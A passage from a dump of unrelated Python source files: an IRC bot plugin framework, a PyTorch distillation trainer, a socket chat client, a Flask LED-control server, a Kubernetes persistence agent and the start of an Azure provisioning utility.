if len(command) == 1 or command[0] != self.canonicalName():
fullCommandName = [self.canonicalName()] + command
else:
fullCommandName = command
# Let "P" be the plugin and "X Y" the command name. The
# fullCommandName is "P X Y"
# check "Y"
cap = checkCommandCapability(msg, self, command[-1])
if cap:
irc.errorNoCapability(cap)
return
# check "P", "P.X", and "P.X.Y"
prefix = []
for name in fullCommandName:
prefix.append(name)
cap = checkCommandCapability(msg, self, prefix)
if cap:
irc.errorNoCapability(cap)
return
try:
self.callingCommand = command
self.callCommand(command, irc, msg, *args, **kwargs)
finally:
self.callingCommand = None
except SilentError:
pass
except (getopt.GetoptError, ArgumentError) as e:
self.log.debug('Got %s, giving argument error.',
utils.exnToString(e))
help = self.getCommandHelp(command)
if 'command has no help.' in help:
# Note: this case will never happen, unless 'checkDoc' is set
# to False.
irc.error(_('Invalid arguments for %s.') % formatCommand(command))
else:
irc.reply(help)
except (SyntaxError, Error) as e:
self.log.debug('Error return: %s', utils.exnToString(e))
irc.error(str(e))
except Exception as e:
self.log.exception('Uncaught exception in %s.', command)
if conf.supybot.reply.error.detailed():
irc.error(utils.exnToString(e))
else:
irc.replyError(msg=msg)
def getCommandHelp(self, command, simpleSyntax=None):
"""Returns the help string of the given command, using
:py:meth:`getCommandMethod`."""
method = self.getCommandMethod(command)
help = getHelp
chan = None
net = None
if dynamic.msg is not None:
chan = dynamic.msg.channel
if dynamic.irc is not None:
net = dynamic.irc.network
if simpleSyntax is None:
simpleSyntax = conf.get(conf.supybot.reply.showSimpleSyntax,
channel=chan, network=net)
if simpleSyntax:
help = getSyntax
if hasattr(method, '__doc__'):
return help(method, name=formatCommand(command))
else:
return format(_('The %q command has no help.'),
formatCommand(command))
class PluginMixin(BasePlugin, irclib.IrcCallback):
public = True
alwaysCall = ()
threaded = False
noIgnore = False
classModule = None
Proxy = NestedCommandsIrcProxy
def __init__(self, irc):
myName = self.name()
self.log = log.getPluginLogger(myName)
self.__parent = super(PluginMixin, self)
self.__parent.__init__(irc)
# We can't do this because of the specialness that Owner and Misc do.
# I guess plugin authors will have to get the capitalization right.
# self.callAfter = map(str.lower, self.callAfter)
# self.callBefore = map(str.lower, self.callBefore)
def canonicalName(self):
return canonicalName(self.name())
def __call__(self, irc, msg):
irc = SimpleProxy(irc, msg)
if msg.command == 'PRIVMSG':
if hasattr(self.noIgnore, '__call__'):
noIgnore = self.noIgnore(irc, msg)
else:
noIgnore = self.noIgnore
if (noIgnore or
not msg.prefix or # simulated echo message
not ircutils.isUserHostmask(msg.prefix) or # Some services impl.
not ircdb.checkIgnored(msg.prefix, msg.channel)):
self.__parent.__call__(irc, msg)
else:
self.__parent.__call__(irc, msg)
def registryValue(self, name, channel=None, network=None, *, value=True):
"""Returns the value of a configuration variable specified by
``name``.
If the configuration variable has a channel- or network-specific
variable (ie. if its value can change across channels or networks),
``channel`` and ``network`` allow getting the most specific value.
If neither is given, returns the generic value.
If ``value=False``, returns the variable itself (an instance
of :py:class:`supybot.registry.Value`) instead of its value."""
if isinstance(network, bool):
# Network-unaware plugin that uses 'value' as a positional
# argument.
(network, value) = (value, network)
plugin = self.name()
group = conf.supybot.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
if channel or network:
group = group.getSpecific(network=network, channel=channel)
if value:
return group()
else:
return group
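    # Hedged usage sketch (hypothetical option name 'enable'): a command would
    # typically read its channel- and network-specific configuration like this:
    #
    #     enabled = self.registryValue('enable', channel=msg.channel,
    #                                  network=irc.network)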
def setRegistryValue(self, name, value, channel=None, network=None):
"""Sets a configuration variable. See :py:meth:`registryValue`"""
plugin = self.name()
group = conf.supybot.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
if network:
group = group.get(':' + network)
if channel:
group = group.get(channel)
group.setValue(value)
def userValue(self, name, prefixOrName, default=None):
try:
id = str(ircdb.users.getUserId(prefixOrName))
except KeyError:
return None
plugin = self.name()
group = conf.users.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
return group.get(id)()
def setUserValue(self, name, prefixOrName, value,
ignoreNoUser=True, setValue=True):
try:
id = str(ircdb.users.getUserId(prefixOrName))
except KeyError:
if ignoreNoUser:
return
else:
raise
plugin = self.name()
group = conf.users.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
group = group.get(id)
if setValue:
group.setValue(value)
else:
group.set(value)
def getPluginHelp(self):
if hasattr(self, '__doc__'):
return self.__doc__
else:
return None
class Plugin(PluginMixin, Commands):
pass
Privmsg = Plugin # Backwards compatibility.
class PluginRegexp(Plugin):
"""Same as Plugin, except allows the user to also include regexp-based
callbacks. All regexp-based callbacks must be specified in the set (or
list) attribute "regexps", "addressedRegexps", or "unaddressedRegexps"
depending on whether they should always be triggered, triggered only when
the bot is addressed, or triggered only when the bot isn't addressed.
"""
flags = re.I
regexps = ()
"""'regexps' methods are called whether the message is addressed or not."""
addressedRegexps = ()
"""'addressedRegexps' methods are called only when the message is addressed,
and then, only with the payload (i.e., what is returned from the
    'addressed' function)."""
unaddressedRegexps = ()
"""'unaddressedRegexps' methods are called only when the message is *not*
addressed."""
Proxy = SimpleProxy
def __init__(self, irc):
self.__parent = super(PluginRegexp, self)
self.__parent.__init__(irc)
self.res = []
self.addressedRes = []
self.unaddressedRes = []
for name in self.regexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.res.append((r, name))
for name in self.addressedRegexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.addressedRes.append((r, name))
for name in self.unaddressedRegexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.unaddressedRes.append((r, name))
def _callRegexp(self, name, irc, msg, m):
method = getattr(self, name)
try:
method(irc, msg, m)
except Error as e:
irc.error(str(e))
except Exception as e:
self.log.exception('Uncaught exception in _callRegexp:')
def invalidCommand(self, irc, msg, tokens):
s = ' '.join(tokens)
for (r, name) in self.addressedRes:
for m in r.finditer(s):
self._callRegexp(name, irc, msg, m)
def doPrivmsg(self, irc, msg):
if msg.isError:
return
proxy = self.Proxy(irc, msg)
if not msg.addressed:
for (r, name) in self.unaddressedRes:
for m in r.finditer(msg.args[1]):
self._callRegexp(name, proxy, msg, m)
for (r, name) in self.res:
for m in r.finditer(msg.args[1]):
self._callRegexp(name, proxy, msg, m)
PrivmsgCommandAndRegexp = PluginRegexp
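# Minimal sketch of a regexp-based plugin (hypothetical plugin and method names,
# for illustration only): each method named in 'regexps' uses its own docstring
# as the pattern, compiled with PluginRegexp.flags, and receives the match.
#
#     class Greeter(PluginRegexp):
#         regexps = ('greet',)
#         def greet(self, irc, msg, match):
#             r"\bhello\b"
#             irc.reply('hi!')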
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
lit.py
|
"""
Author: Animesh Koratana <koratana@stanford.edu>
LIT: Lightweight Iterative Trainer
"""
import os
import time
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.cuda
import torch.optim
import torch.utils.data
from tqdm import tqdm
from model_parallel import *
import threading
import fp16
from tensorboardX import SummaryWriter
beta = 0.5
class Section(object):
def __init__(self, section):
self.network = section
self.optimizer = None
self.lr_scheduler = None
self.params = None
self.init = False
self.set_initial_lr = False
self.device = torch.device("cpu")
#Half vars
self.half = None
self.loss_scaling = 1
def set_optimizer(self, optimizer_fn, train_params):
self.optimizer = optimizer_fn
self.params = train_params
return self
def set_lr_scheduler(self, scheduler):
self.lr_scheduler = scheduler
return self
def build(self, half = False):
assert self.network and self.optimizer and self.lr_scheduler and self.params
self.half = half
if self.half:
# Cast network to half
self.network = fp16.FP16(self.network)
# Manage a fp32 version of the weights
self.params = [param.clone().type(torch.cuda.FloatTensor).detach() for param in self.params]
for p in self.params:
p.requires_grad = True
self.optimizer = self.optimizer(self.params)
if self.set_initial_lr:
for group in self.optimizer.param_groups:
group.setdefault('initial_lr', group['lr'])
self.lr_scheduler = self.lr_scheduler(self.optimizer)
self.init = True
return self
def __call__(self, inp):
return self.network(inp)
def step(self, out, target, losses_log, criterion, lock):
global beta
assert(self.init)
loss = criterion(out, target) * self.loss_scaling * (1 - beta)
if self.half:
loss.backward()
fp16.set_grad(self.params, list(self.network.parameters()))
if self.loss_scaling != 1:
for param in self.params:
                    param.grad.data = param.grad.data / self.loss_scaling
self.optimizer.step()
fp16.copy_in_params(self.network, self.params)
self.network.zero_grad()
else:
loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
with lock:
losses_log.update(loss.item(), out.size(0))
def eval(self, out, target, losses_log, criterion, lock):
loss = criterion(out, target)
with lock:
losses_log.update(loss.item(), out.size(0))
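# Hedged usage sketch (hypothetical sub-network and hyper-parameters, not from
# the original training setup): a Section wraps one student sub-network and is
# configured fluently before training.
#
#     block = nn.Sequential(nn.Linear(128, 128), nn.ReLU())
#     section = (Section(block)
#                .set_optimizer(lambda p: torch.optim.SGD(p, lr=0.1),
#                               train_params=list(block.parameters()))
#                .set_lr_scheduler(
#                    lambda opt: torch.optim.lr_scheduler.MultiStepLR(opt, [30, 60]))
#                .build(half=False))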
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def correct(outputs, targets, top=(1, )):
with torch.no_grad():
_, predictions = outputs.topk(max(top), dim=1, largest=True, sorted=True)
targets = targets.view(-1, 1).expand_as(predictions)
corrects = predictions.eq(targets).cpu().int().cumsum(1).sum(0)
tops = list(map(lambda k: corrects.data[k - 1], top))
return tops
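# Illustrative check of correct() (uses torch imported above): with perfectly
# matching predictions every sample counts as a top-1 hit, so
# correct(torch.eye(4), torch.arange(4), top=(1,)) yields a single count of 4.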
class LitTrainer():
def __init__(self, f):
cudnn.benchmark = True
global beta
beta = f.beta
self.distributed = torch.cuda.device_count() > 1
# Check the save_dir exists or not
if not os.path.exists(f.save_dir):
os.makedirs(f.save_dir)
if not os.path.exists(f.log_dir):
os.makedirs(f.log_dir)
self.writer = SummaryWriter(f.log_dir)
self.save_dir = f.save_dir
self.model_name = f.model_name
self.save_every = f.save_every
self.start_epoch = f.start_epoch
self.start_segment = f.start_segment
self.half = f.half
self.lit_sections = f.lit_sections
self.sequence = f.sequence
self.momentum = f.momentum
self.weight_decay = f.weight_decay
self.loss_scaling = f.loss_scaling
self._make_optimizers(self.lit_sections)
self.trainable_model = LearnerModelParallel(f.trainable_model, self.lit_sections)
for section in self.lit_sections.values():
section.build(half = self.half)
self.base_model = f.base_model
if self.half:
self.base_model = fp16.FP16(self.base_model)
self.base_model = nn.DataParallel(self.base_model).cuda()
for param in self.base_model.parameters(): param.requires_grad = False
self.lit_train_loader = f.lit_training_data_loader
self.fine_tuning_loader = f.fine_tuning_data_loader
self.val_loader = f.val_data_loader
self.lit_criterion = f.lit_criterion()
self.fine_tuning_criterion = f.fine_tuning_criterion()
self.best_accuracy1 = 0
def _make_optimizers(self, lit_sections):
lit_start_epoch = self.start_epoch if self.start_segment == 0 else 0
for k, v in lit_sections.items():
v.loss_scaling = self.loss_scaling
v.set_optimizer(lambda params :torch.optim.SGD(params,
lr = self.sequence["lit"]["lr"],
momentum=self.momentum,
weight_decay=self.weight_decay),
train_params = v.network.parameters())
if lit_start_epoch > 0:
v.set_initial_lr = True
v.set_lr_scheduler(lambda optimizer : torch.optim.lr_scheduler.MultiStepLR(optimizer,
milestones=self.sequence["lit"]["milestones"],
last_epoch=lit_start_epoch-1, gamma=0.5))
def train(self):
self._train_lit()
torch.cuda.empty_cache()
self.trainable_model.cpu()
self.trainable_model = self.trainable_model.module
self._fine_tune()
def _train_lit(self):
if self.start_segment > 0: return
# Freeze the whole model and then unfreeze only the sections
for param in self.trainable_model.parameters():
param.requires_grad = False
self._unfreeze_training_model_sections(*list(self.lit_sections.keys()))
for epoch in tqdm(range(self.start_epoch, self.sequence["lit"]["epochs"]), desc="LIT Training", dynamic_ncols=True):
t_losses, t_data_time, t_batch_time = self._lit_train_one_epoch(epoch)
v_losses, v_data_time, v_batch_time = self._lit_eval_one_epoch(epoch)
for section in self.lit_sections.values(): section.lr_scheduler.step()
for i, (t_loss, v_loss) in enumerate(zip(t_losses, v_losses)):
# Add logging data
self.writer.add_scalar('loss/section{t}/train'.format(t=i+1), t_loss, epoch)
self.writer.add_scalar('loss/section{t}/validation'.format(t=i+1), v_loss, epoch)
            if epoch > 0 and epoch % self.save_every == 0:
torch.save(self.trainable_model.module.state_dict(),
os.path.join(self.save_dir, str("checkpoint_" + self.model_name)))
def _fine_tune(self):
torch.cuda.empty_cache()
if self.start_segment<=2:
# Unfreeze everything and then train everything together
for param in self.trainable_model.parameters():
param.requires_grad = True
if self.half:
self.trainable_model = nn.DataParallel(fp16.FP16(self.trainable_model)).cuda()
param_copy = [param.clone().type(torch.cuda.FloatTensor).detach() for param in self.trainable_model.parameters()]
for param in param_copy:
param.requires_grad = True
optimizer = torch.optim.SGD(param_copy, self.sequence["full_model"]["lr"],
momentum=self.momentum,
weight_decay=self.weight_decay)
else:
param_copy = None
self.trainable_model = nn.DataParallel(self.trainable_model).cuda()
optimizer = torch.optim.SGD(self.trainable_model.parameters(), self.sequence["full_model"]["lr"],
momentum=self.momentum,
weight_decay=self.weight_decay)
start_epoch = self.start_epoch if self.start_segment == 2 else 0
if start_epoch > 0:
for group in optimizer.param_groups:
group.setdefault('initial_lr', group['lr'])
lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=self.sequence["full_model"]["milestones"], last_epoch=start_epoch-1)
self._run_fine_tuning_epochs(optimizer, lr_scheduler, "full model", self.sequence["full_model"]["epochs"], start_epoch=start_epoch, params= param_copy)
def _run_fine_tuning_epochs(self, optimizer, lr_scheduler, tag, num_epochs, start_epoch = 0, params = None):
for epoch in tqdm(range(start_epoch, num_epochs), desc="Fine Tuning {}".format(tag), dynamic_ncols=True):
            t_loss, t_data_time, t_batch_time, t_accuracy1 = self._fine_tune_train_one_epoch(
                tag=tag, optimizer=optimizer, current_epoch=epoch, params=params)
v_loss, v_data_time, v_batch_time, v_accuracy1 = self._fine_tune_evaluate_one_epoch(
tag=tag, current_epoch=epoch)
self.writer.add_scalar('loss/{t}/train'.format(t=tag), t_loss, epoch)
self.writer.add_scalar('loss/{t}/validation'.format(t=tag), v_loss, epoch)
self.writer.add_scalar('prec1/{t}/train'.format(t=tag), t_accuracy1, epoch)
self.writer.add_scalar('prec1/{t}/validation'.format(t=tag), v_accuracy1, epoch)
best = v_accuracy1 > self.best_accuracy1
self.best_accuracy1 = max(v_accuracy1, self.best_accuracy1)
if best:
tqdm.write("Saving the best model with prec1@ {a}".format(a=v_accuracy1))
torch.save(self.trainable_model.module.state_dict(), os.path.join(self.save_dir, self.model_name))
            if epoch > 0 and epoch % self.save_every == 0:
torch.save(self.trainable_model.module.state_dict(),
os.path.join(self.save_dir, str("checkpoint_" + self.model_name)))
lr_scheduler.step()
def _lit_train_one_epoch(self, current_epoch):
global beta
batch_time = AverageMeter()
data_time = AverageMeter()
losses = [AverageMeter() for i in range(len(self.lit_sections.keys()))]
# switch to appropriate mode
self.trainable_model.train()
self.base_model.eval()
criterion = self.lit_criterion
end = time.time()
data_loader = self.lit_train_loader
lock = threading.Lock()
for i, (inp, target) in tqdm(enumerate(data_loader),
desc='LIT Training: Epoch {epoch}'.format(epoch = current_epoch),
dynamic_ncols=True, total= len(data_loader), leave=True):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
# measure data loading time
data_time.update(time.time() - end)
input_var = inp.cuda().detach()
#Get teacher model's intermediate
with torch.no_grad():
teacher_features, soft_targets = self.base_model(input_var, get_features = True)
learner_features = self.trainable_model(teacher_features)
learner_out = self.trainable_model.module(input_var)
full_loss = self.fine_tuning_criterion(learner_out, soft_targets, target) * beta
full_loss.backward(retain_graph=True)
jobs = []
for id in self.lit_sections.keys():
learner_output = learner_features[id]
target_feature = teacher_features[id].cuda(self.lit_sections[id].device)
losses_log = losses[id-1]
p = threading.Thread(target=self.lit_sections[id].step, args=(learner_output, target_feature, losses_log, criterion, lock))
jobs.append(p)
for job in jobs:
job.start()
for job in jobs:
job.join()
batch_time.update(time.time() - end)
end = time.time()
# Clean up
del inp, teacher_features, input_var, learner_output
return [loss.avg for loss in losses], data_time.avg, batch_time.avg
def _lit_eval_one_epoch(self, current_epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = [AverageMeter() for i in range(len(self.lit_sections.keys()))]
# switch to appropriate mode
self.trainable_model.eval()
self.base_model.eval()
criterion = self.lit_criterion
end = time.time()
lock = threading.Lock()
with torch.no_grad():
for i, (inp, target) in tqdm(enumerate(self.val_loader),
desc='LIT Validation: Epoch {epoch}'.format(epoch=current_epoch),
dynamic_ncols=True, total=len(self.val_loader), leave=True):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
# measure data loading time
data_time.update(time.time() - end)
input_var = inp.cuda().detach()
# Get teacher model's intermediate
teacher_features, _ = self.base_model(input_var, get_features=True)
learner_features = self.trainable_model(teacher_features)
jobs = []
for id in self.lit_sections.keys():
learner_output = learner_features[id]
target_feature = teacher_features[id].cuda(self.lit_sections[id].device)
losses_log = losses[id-1]
p = threading.Thread(target=self.lit_sections[id].eval, args=(learner_output, target_feature, losses_log, criterion, lock))
jobs.append(p)
for job in jobs:
job.start()
for job in jobs:
job.join()
batch_time.update(time.time() - end)
end = time.time()
# Clean up
del inp, target, teacher_features, input_var, learner_output
return [loss.avg for loss in losses], data_time.avg, batch_time.avg
def _fine_tune_train_one_epoch(self, tag, optimizer, current_epoch, params = None):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
accuracies = AverageMeter()
# switch to appropriate mode
self.trainable_model.train()
self.base_model.eval()
criterion = self.fine_tuning_criterion
end = time.time()
data_loader = self.fine_tuning_loader
for i, (inp, target) in tqdm(enumerate(data_loader),
desc="Fine Tuning {tag}: Epoch {epoch}".format(tag = tag, epoch=current_epoch),
dynamic_ncols=True, total=len(data_loader), leave=True):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
# measure data loading time
data_time.update(time.time() - end)
target_var = target.cuda(non_blocking = True)
input_var = inp.cuda() if not self.distributed else inp
# compute outputs and loss
with torch.no_grad():
teacher_outputs = self.base_model(input_var).detach().cuda(non_blocking = True)
learner_output = self.trainable_model(input_var).cuda()
loss = criterion(learner_output, teacher_outputs, target_var) * self.loss_scaling
if self.half:
self.trainable_model.zero_grad()
loss.backward()
fp16.set_grad(params, list(self.trainable_model.parameters()))
if self.loss_scaling != 1:
for param in params:
param.grad.data = param.grad.data/self.loss_scaling
optimizer.step()
fp16.copy_in_params(self.trainable_model, params)
else:
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Calculate vals for logging
losses.update(loss.item(), batch_size)
top_correct = correct(learner_output, target, top=(1, ))[0]
accuracies.update(top_correct.item() * (100. / batch_size), batch_size)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
del inp, target, loss, input_var, target_var, learner_output
return losses.avg, data_time.avg, batch_time.avg, accuracies.avg
def _fine_tune_evaluate_one_epoch(self, tag, current_epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
accuracies = AverageMeter()
# switch to appropriate mode
self.trainable_model.eval()
self.base_model.eval()
criterion = self.fine_tuning_criterion
end = time.time()
data_loader = self.val_loader
with torch.no_grad():
for i, (inp, target) in tqdm(enumerate(data_loader),
desc="Evaluating {tag}: Epoch {epoch}".format(tag = tag, epoch=current_epoch),
dynamic_ncols=True, total=len(data_loader), leave=True):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
# measure data loading time
data_time.update(time.time() - end)
target_var = target.cuda(non_blocking = True)
input_var = inp.cuda() if not self.distributed else inp
# compute outputs and loss
teacher_outputs = self.base_model(input_var).detach().cuda(non_blocking = True)
learner_output = self.trainable_model(input_var).cuda()
loss = criterion(learner_output, teacher_outputs, target_var) * self.loss_scaling
# Calculate vals for logging
losses.update(loss.item(), batch_size)
top_correct = correct(learner_output, target, top=(1, ))[0]
accuracies.update(top_correct.item() * (100. / batch_size), batch_size)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
del input_var, target_var, inp, target, learner_output
return losses.avg, data_time.avg, batch_time.avg, accuracies.avg
def close_log_writer(self):
self.writer.close()
def validate_model(self):
# Load best trained model for validation
best_model = torch.load(os.path.join(self.save_dir, self.model_name))
try:
self.trainable_model.module.load_state_dict(best_model)
except:
self.trainable_model.load_state_dict(best_model)
self.trainable_model.cuda()
if isinstance(self.trainable_model, LearnerModelParallel):
self.trainable_model = self.trainable_model.module
t_losses = AverageMeter()
t_accuracy = AverageMeter()
criterion = nn.CrossEntropyLoss()
# switch to appropriate mode
self.trainable_model.eval()
# self.base_model.eval()
with torch.no_grad():
for i, (input, target) in tqdm(enumerate(self.val_loader), desc='Validating Model for Benchmark',
dynamic_ncols=True, total= len(self.val_loader)):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
input = input.cuda()
target_var = target.cuda(non_blocking=True)
# compute outputs
t_output = self.trainable_model(input)
t_loss = criterion(t_output.cuda() + 1e-16, target_var)
# Calculate vals for logging
t_losses.update(t_loss.item(), input.size(0))
top_correct = correct(t_output, target, top=(1, ))[0]
t_accuracy.update(top_correct.item() * (100. / batch_size), batch_size)
return t_losses.avg, t_accuracy.avg
def _unfreeze_training_model_sections(self, *sections):
for i in sections:
for param in self.lit_sections[i].network.parameters():
param.requires_grad = True
def _freeze_training_model_sections(self, *sections):
for i in sections:
for param in self.lit_sections[i].network.parameters():
param.requires_grad = False
|
vChat2.0.py
|
#coding:utf-8
from socket import *
import time, threading
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
serverName = '118.89.229.68';
sendPort = 12001;
receivePort = 12002;
checkPort = 12003;
userName = "";
key = "";
pwd = "";
def sendThread():
while 1:
sentence = raw_input();
sentence += "_";
sentence += userName;
sentence += "_";
sentence += key;
sentence += "_";
sentence += pwd;
clientSocket = socket(AF_INET, SOCK_STREAM);
clientSocket.connect((serverName, sendPort));
sentence=sentence.decode('GBK').encode('UTF-8');
clientSocket.send(sentence);
checker = clientSocket.recv(2048);
if (checker=="fuck"):
print("\n!!!Don't try to cheat!!!\n");
clientSocket.close();
def receiveThread():
while 1:
time.sleep(0.5);
monitorSocket = socket(AF_INET, SOCK_STREAM);
monitorSocket.connect((serverName, receivePort));
sentence=key+"_"+userName+"_"+pwd;
sentence=sentence.decode('GBK').encode('UTF-8');
monitorSocket.send(sentence);
relay = monitorSocket.recv(2048);
if relay:
relay=relay.decode('UTF-8').encode('GBK');
print ">>>"+relay;
monitorSocket.close();
while 1:
    # 0 -> success, 1 -> wrong pwd, 2 -> wrong room keyword
userName = raw_input("Your name: ");
key = raw_input("Chat room keyword: ");
pwd = raw_input("Your own keyword: ");
clientSocket = socket(AF_INET, SOCK_STREAM);
clientSocket.connect((serverName, checkPort));
sentence=key+"_"+userName+"_"+pwd;
sentence=sentence.decode('GBK').encode('UTF-8');
clientSocket.send(sentence);
relay = clientSocket.recv(2048);
clientSocket.close();
if relay == "0":
print (">>>Welcome to vChat!\n");
t1 = threading.Thread(target=sendThread);
t2 = threading.Thread(target=receiveThread);
t1.start();
t2.start();
t1.join();
t2.join();
break;
elif relay == "1":
print ("! Wrong pwd");
else:
print ("! Wrong room keyword");
raw_input("Press any key to continue...");
|
server.py
|
from flask import Flask, render_template, redirect, request
import string
import signal
import sys
from threading import Thread
import control
app = Flask(__name__)
current_function = None
controller = control.Control()
control_thread = None
@app.route('/')
def index():
return render_template('index.html', function=current_function)
@app.route('/white', methods=['GET'])
def white():
# Set function
global current_function
current_function = "White"
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.color, args=(255, 255, 255))
control_thread.start()
return redirect('/', code=302)
@app.route('/color_temp', methods=['GET'])
def color_temp():
# Get and parse data
temp = str(request.args['color_temp'])
if temp.isdigit() and 500 <= int(temp) <= 20000:
temp = int(temp)
else:
temp = 5500
# Set function
global current_function
current_function = "Color Temperature {}".format(temp)
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.color_temp, args=(temp,))
control_thread.start()
return redirect('/', code=302)
@app.route('/color', methods=['GET'])
def color():
# Get and parse data
rgb = str(request.args['color']).lstrip('#')
if len(rgb) == 6 and all(c in string.hexdigits for c in rgb):
rgb = tuple(int(rgb[i:i + 2], 16) for i in (0, 2, 4))
else:
rgb = (255, 255, 255)
# Set function
global current_function
current_function = "RGB Color ({}, {}, {})".format(*rgb)
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.color, args=rgb)
control_thread.start()
return redirect('/', code=302)
@app.route('/rainbow', methods=['GET'])
def rainbow():
# Set function
global current_function
current_function = "Rainbow"
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.rainbow)
control_thread.start()
return redirect('/', code=302)
@app.route('/rainbow_onecolor', methods=['GET'])
def rainbow_onecolor():
# Set function
global current_function
current_function = "Rainbow with single color"
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.rainbow_onecolor)
control_thread.start()
return redirect('/', code=302)
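# The five routes above repeat the same stop-old-thread / start-new-thread
# hand-off. A sketch of how that pattern could be factored out (hypothetical
# helper, not part of the original server):
#
#     def run_effect(target, *args):
#         global control_thread
#         if control_thread:
#             controller.running = False
#             control_thread.join(0.1)
#         controller.running = True
#         control_thread = Thread(target=target, args=args)
#         control_thread.start()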
def signal_handler(signal, frame):
print('Exiting...')
if control_thread:
controller.running = False
control_thread.join(0.1)
sys.exit(0)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
app.debug = False
app.run(host='0.0.0.0', port=80)
|
main.py
|
# -*- coding: utf-8 -*-
"""Persistence agent."""
import argparse
import os
import sys
import threading
from kubernetes import client
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from projects.agent.logger import DEFAULT_LOG_LEVEL
from projects.agent.watchers.deployment import watch_seldon_deployments
from projects.agent.watchers.workflow import watch_workflows
from projects.kubernetes.kube_config import load_kube_config
DB_HOST = os.getenv("MYSQL_DB_HOST", "mysql.platiagro")
DB_NAME = os.getenv("MYSQL_DB_NAME", "platiagro")
DB_USER = os.getenv("MYSQL_DB_USER", "root")
DB_PASS = os.getenv("MYSQL_DB_PASSWORD", "")
DB_URL = f"mysql+pymysql://{DB_USER}:{DB_PASS}@{DB_HOST}/{DB_NAME}"
engine = create_engine(DB_URL,
pool_size=5,
pool_recycle=300,
max_overflow=10)
session = scoped_session(sessionmaker(autocommit=False,
autoflush=False,
bind=engine))
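# With the defaults above, DB_URL resolves to something like
# "mysql+pymysql://root:@mysql.platiagro/platiagro". The scoped_session is
# passed to both watcher threads in run(); each thread gets its own
# thread-local Session bound to the shared engine.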
def run(**kwargs):
"""
Watches kubernetes events and saves relevant data.
"""
load_kube_config()
api = client.CustomObjectsApi()
log_level = kwargs.get("log_level", DEFAULT_LOG_LEVEL)
workflows_thread = threading.Thread(target=watch_workflows, args=(api, session), kwargs={"log_level": log_level})
sdeps_thread = threading.Thread(target=watch_seldon_deployments, args=(api, session), kwargs={"log_level": log_level})
workflows_thread.start()
sdeps_thread.start()
def parse_args(args):
"""Takes argv and parses API options."""
parser = argparse.ArgumentParser(
description="Persistence Agent"
)
parser.add_argument(
"--debug", action="count", help="Enable debug"
)
parser.add_argument(
"--log-level",
nargs="?",
choices=["NOTSET", "DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"],
default=DEFAULT_LOG_LEVEL,
const=DEFAULT_LOG_LEVEL,
help="Sets log level to logging"
)
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
log_level = args.log_level
if args.debug:
engine.echo = True
run(log_level=log_level)
|
azure_util.py
|
from azure.identity import AzureCliCredential
from azure.identity._credentials import azure_cli
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.network.v2020_06_01.models import NetworkSecurityGroup
from azure.mgmt.network.v2020_06_01.models import SecurityRule
import os
import threading
from tqdm import tqdm
sgx_1_core = "Standard_DC1s_v2"
sgx_2_core = "Standard_DC2s_v2"
sgx_4_core = "Standard_DC4s_v2"
sgx_8_core = "Standard_DC8s_v2"
RESOURCE_GROUP_NAME = "scalable_oram_resource_group"
VNET_NAME = "scalable_oram_vnet"
SUBNET_NAME = "scalable_oram_subnet"
IP_NAME = "scalable_oram_ip"
IP_CONFIG_NAME = "scalable_oram_ip_config"
SEC_GROUP_NAME = "scalable_oram_sec_group"
NIC_NAME = "scalable_oram_nic"
USERNAME = "azureuser"
DEFAULT_PASSWORD = "scalable_oram"
LOCATION = "eastus"
print_lock = threading.Lock()
azure_cli_lock = threading.Lock()
pbar_lock = threading.Lock()
class AzureSetup:
def __init__(self, resource_group_name):
self.name = resource_group_name
self.resource_group_name = "%s_resource_group" % resource_group_name
self.vnet_name = "%s_vnet" % resource_group_name
self.subnet_name = "%s_subnet" % resource_group_name
self.ip_name = "%s_ip" % resource_group_name
self.ip_config_name = "%s_ip_config" % resource_group_name
self.sec_group_name = "%s_sec_group" % resource_group_name
self.nic_name = "%s_nic" % resource_group_name
def runAzureSetup(self, location):
credential = AzureCliCredential()
